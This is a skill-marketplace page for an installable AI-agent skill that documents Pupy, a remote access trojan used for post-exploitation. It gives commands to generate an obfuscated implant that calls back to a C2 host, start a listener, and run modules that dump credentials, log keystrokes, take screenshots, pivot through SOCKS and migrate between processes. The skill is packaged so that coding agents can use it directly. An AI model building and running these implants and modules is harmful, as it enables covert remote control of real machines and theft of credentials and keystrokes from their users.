aeondave/pupy
offensive-tools/c2/pupy/SKILL.md
Cross-platform remote administration and post-exploitation tool with Python implants. Use when needing a lightweight RAT with in-memory modules, multiple transports (TCP/HTTP/WebSocket), and migration capabilities.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill pupyInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Mar 31, 2026, 9:00 PM57.2s1 file scanned
SKILL.md
- name:
- pupy
- description:
- Cross-platform remote administration and post-exploitation tool with Python implants. Use when needing a lightweight RAT with in-memory modules, multiple transports (TCP/HTTP/WebSocket), and migration capabilities.
- license:
- MIT
- compatibility:
- Python 2/3; Docker recommended; Linux/macOS; github.com/n1nj4sec/pupy
- author:
- AeonDave
- version:
- 1.0
Pupy
Cross-platform Python RAT with in-memory module loading and multiple C2 transports.
Quick Start
# Docker (recommended)
docker pull n1nj4sec/pupy
docker run -it --rm -p 8443:8443 n1nj4sec/pupy pupysh
# Generate implant
gen -f exe -t obfs3 connect --host C2:8443 -o agent.exe
# Start listener
listen -a obfs3 8443
Core Commands
| Command | Purpose |
|---------|---------|
| sessions | List active sessions |
| interact <id> | Enter session |
| run <module> | Run a post-ex module |
| gen | Generate implant |
| listen | Start listener |
| upload/download | File transfer |
Common Modules
run post.gather.credentials # Dump creds
run post.gather.keylogger # Start keylogger
run post.gather.screenshot # Screenshot
run post.pivot.socks5 # SOCKS5 proxy
run post.migrate # Process migration
Resources
| File | When to load |
|------|--------------|
| references/ | Transport config and module index |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026